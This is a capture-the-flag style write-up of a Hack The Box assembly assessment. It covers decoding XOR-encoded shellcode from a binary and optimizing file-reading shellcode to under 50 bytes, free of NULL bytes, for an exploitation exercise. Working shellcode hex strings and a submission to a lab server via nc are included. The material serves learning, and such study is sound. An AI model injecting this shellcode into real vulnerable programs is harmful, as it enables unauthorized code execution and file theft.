This post covers the end-of-module assessment for an assembly language course, which consists of two tasks. The first is a simple reversing task and the second is about optimizing shellcode.
Task 1
For the first task, we’re given a binary called loaded_shellcode. We have to disassemble it, modify the assembly code to decode the shellcode loaded in it, then execute it to get the flag. The decoding key is stored in the callee-saved register rbx.
To disassemble the .text section:
objdump -M intel --no-show-raw-insn --no-addresses -d loaded_shellcode
The encoded shellcode is loaded by initializing the register rax with a value, then pushing it onto the stack. This process is repeated 14 times. At the end, the decoding key is loaded into the callee-saved register rbx.
The quickest approach would be to pop each value from the stack, xor it with the key in rbx, and repeat this 14 times, then run the program in a debugger and note the decoded value at each step. I wanted to make it a little more fun by writing a procedure that performs these steps and also prints the entire decoded shellcode to my terminal, ready to be executed as is.
The approach I came up with is:
- pop the value at the top of the stack (where rsp points) into an unused register (rdx in my case)
- xor it with the key in rbx
- print the value in rdx with libc functions printf and fflush
- loop these steps 14 times
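The pop/xor/print loop above can be modelled in Python to check the logic before writing the assembly. This is only a sketch: the key and the pushed values are made-up placeholders, not the ones from loaded_shellcode, and decode_stack is a hypothetical helper name.

```python
MASK64 = (1 << 64) - 1  # registers are 64 bits wide


def decode_stack(pushed, key):
    """Pop every qword (last pushed first), xor it with key, return the hex dump."""
    stack = list(pushed)                      # copy so the caller's list is untouched
    chunks = []
    while stack:
        value = stack.pop()                   # pop rdx
        value = (value ^ key) & MASK64        # xor rdx, rbx
        chunks.append(format(value, "016x"))  # printf("%016llx", rdx)
    return "".join(chunks)


# Placeholder data (assumptions): two plaintext qwords and an arbitrary key.
key = 0x1122334455667788
plain = [0x4831C05048BBE671, 0x014831FF40B70148]
# Encoded values are pushed so that the first qword ends up on top of the stack.
pushed = [p ^ key for p in reversed(plain)]

print(decode_stack(pushed, key))
```

Because the stack is last-in, first-out, the value pushed last is the first one decoded and printed.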
The format specifier used for printf:
outFormat db "%016llx", 0x00
- 0 : pad the output with zeros instead of spaces when the minimum width is not met
- 16 : minimum field width of 16 characters; shorter values are padded on the left
- ll : length modifier for long long int
- x : unsigned integer printed in lowercase hexadecimal
- 0x00 : the NUL byte that terminates the format string passed to printf
This is necessary because, for example, one of the values would print as 14831ff40b70148 instead of 014831ff40b70148, and the missing leading 0 would break the shellcode.
Also, to print all the values on the same line, I need to call fflush to flush all streams: stdout is buffered, so output without a trailing newline is not guaranteed to appear otherwise. The alternative would be to print each value on its own line.
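The effect of the padding is easy to reproduce in Python, whose format mini-language uses the same 0 flag and width as printf (there is no ll modifier because Python integers are not sized). The value is the one quoted above.

```python
value = 0x014831FF40B70148

unpadded = format(value, "x")    # like printf("%llx"): the leading zero is dropped
padded = format(value, "016x")   # like printf("%016llx"): always 16 hex digits

print(unpadded, len(unpadded))
print(padded, len(padded))
```

With 14 values printed back to back, a single 15-digit chunk would shift every following byte by half a byte.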
Once this is all put together, assemble the code, link it dynamically against libc and execute it:
nasm -f elf64 flag.s && ld flag.o -o flag -lc --dynamic-linker /lib64/ld-linux-x86-64.so.2 && ./flag
4831c05048bbe671167e66af44215348bba723467c7ab51b4c5348bbbf264d344bb677435348bb9a10633620e771125348bbd244214d14d244214831c980c1044889e748311f4883c708e2f74831c0b0014831ff40b7014831f64889e64831d2b21e0f054831c04883c03c4831ff0f05
To execute the shellcode, I’ll use the pwntools library in Python:
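The loader listing is not reproduced here. Below is a minimal sketch of what such a loader.py could look like, assuming pwntools is installed and using its run_shellcode helper. The parse_hex function and the overall layout are my assumptions, not necessarily the original script.

```python
import sys


def parse_hex(hex_string):
    """Turn the printed hex dump into raw shellcode bytes."""
    return bytes.fromhex(hex_string.strip())


def run(hex_string):
    # Imported lazily so parse_hex can be used without pwntools installed.
    from pwn import context, run_shellcode

    context(os="linux", arch="amd64", log_level="error")
    # Wraps the bytes in a temporary ELF, starts it and attaches to its output.
    run_shellcode(parse_hex(hex_string)).interactive()


# Only run when called as: python loader.py '<hex string>'
if __name__ == "__main__" and len(sys.argv) == 2:
    run(sys.argv[1])
```

Running the shellcode in a child process rather than inside the Python interpreter means the exit syscall at the end of the payload only terminates that child.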
I can then execute the shellcode, which prints the flag:
python loader.py '4831c05048bbe671167e66af44215348bba723467c7ab51b4c5348bbbf264d344bb677435348bb9a10633620e771125348bbd244214d14d244214831c980c1044889e748311f4883c708e2f74831c0b0014831ff40b7014831f64889e64831d2b21e0f054831c04883c03c4831ff0f05'
HTB{4553mbly_d3bugg1ng_m4573r}
Task 2
For the second task, set in a binary exploitation exercise, we reach the point where we have to run our shellcode. A buffer of 50 bytes is available. The exercise consists of optimizing the given assembly code to make it shellcode-ready and under 50 bytes.
Before starting, a quick reminder of the shellcoding requirements:
- Does not contain variables
- Does not refer to direct memory addresses
- Does not contain any NULL bytes (00)
The provided assembly code :
Using this Python code, we can generate our shellcode from the binary:
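The script itself is missing from this page. Here is a sketch that produces the same three pieces of information as the output below (hex dump, size, NULL-byte check), assuming pwntools' ELF class is used to read the .text section. The function names are hypothetical.

```python
import sys


def report(shellcode):
    """Return the hex dump and a 'size - NULL check' summary line."""
    verdict = "Found NULL byte" if 0 in shellcode else "No NULL bytes"
    return shellcode.hex(), f"{len(shellcode)} bytes - {verdict}"


def text_section(path):
    # Lazy import: only needed when reading a real binary (requires pwntools).
    from pwn import ELF, context

    context(os="linux", arch="amd64", log_level="error")
    return ELF(path).section(".text")


# Only run when called as: python shellcoder.py <binary>
if __name__ == "__main__" and len(sys.argv) == 2:
    for line in report(text_section(sys.argv[1])):
        print(line)
```

Keeping report separate from the ELF parsing makes it possible to check any byte string, for example a hand-edited hex dump, against the size and NULL-byte requirements.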
This is the current result :
python shellcoder.py flag
6a0048bf2f666c672e74787457b8020000004889e7be000000000f05488d374889c7b800000000ba180000000f05b801000000bf01000000ba180000000f05b83c000000bf000000000f05
75 bytes - Found NULL byte
Using pwn disasm we can see the instructions from the shellcode :
pwn disasm '6a0048bf2f666c672e74787457b8020000004889e7be000000000f05488d374889c7b800000000ba180000000f05b801000000bf01000000ba180000000f05b83c000000bf000000000f05' -c 'amd64'
As expected, we’re exceeding 50 bytes and the shellcode contains NULL bytes (each 00 in the output).
Here’s the list of changes made to respect the requirements:
- Line 1: replace push 0 with xor rsi, rsi followed by push rsi. This still pushes 0 onto the stack and also replaces mov rsi, 0 from line 13, since rsi is already zero.
- Line 11: replace mov rax, 2 with mov al, 2 to use the 1-byte register al instead of the 8-byte rax.
- Line 18: replace mov rdi, rax with mov edi, eax to use 4-byte registers.
- Line 19: replace mov rax, 0 with xor al, al to set the syscall number to 0.
- Line 21: replace mov rdx, 24 with mov dl, 24 to use a 1-byte register, which is all that is needed.
- Lines 24-25: replace mov rax, 1 and mov rdi, 1 with mov al, 1 and mov dil, 1 to use 1-byte registers.
- Line 26: remove mov rdx, 24 since the value is already set.
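To see where the savings come from, the encodings of each replaced instruction can be compared directly. The byte strings below are read off the two hex dumps in this post (the first dump shows mov rax, 2 assembled as the 5-byte b802000000, for instance). The table layout and the saved_bytes helper are only an illustration.

```python
# description -> (bytes before, bytes after), both as hex strings
CHANGES = {
    "push 0 + mov rsi, 0 -> xor rsi, rsi + push rsi": ("6a00" + "be00000000", "4831f6" + "56"),
    "mov rax, 2 -> mov al, 2": ("b802000000", "b002"),
    "mov rdi, rax -> mov edi, eax": ("4889c7", "89c7"),
    "mov rax, 0 -> xor al, al": ("b800000000", "30c0"),
    "mov rdx, 24 -> mov dl, 24": ("ba18000000", "b218"),
    "mov rax, 1 -> mov al, 1": ("b801000000", "b001"),
    "mov rdi, 1 -> mov dil, 1": ("bf01000000", "40b701"),
    "second mov rdx, 24 -> removed": ("ba18000000", ""),
}


def saved_bytes(changes):
    """Total number of bytes saved by all the listed replacements."""
    return sum(
        len(bytes.fromhex(before)) - len(bytes.fromhex(after))
        for before, after in changes.values()
    )


for name, (before, after) in CHANGES.items():
    print(f"{name}: {len(before) // 2} -> {len(after) // 2} bytes")
print("total saved:", saved_bytes(CHANGES))
```

The listed changes save 23 bytes, which takes the 75-byte original down to 52, still over the limit. Judging from the two dumps, the remaining 12 bytes are the trailing b83c000000 bf00000000 0f05 sequence (the exit syscall, number 60), which no longer appears in the final shellcode.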
This is the final code:
If I generate the shellcode and check for null bytes this is the result :
python shellcoder.py flag
4831f65648bf2f666c672e74787457b0024889e70f05488d3789c730c0b2180f05b00140b7010f05
40 bytes - No NULL bytes
Finally, if I send the shellcode to the server the flag is returned :
nc 94.237.63.201 58840
4831f65648bf2f666c672e74787457b0024889e70f05488d3789c730c0b2180f05b00140b7010f05
HTB{5h3llc0d1ng_g3n1u5}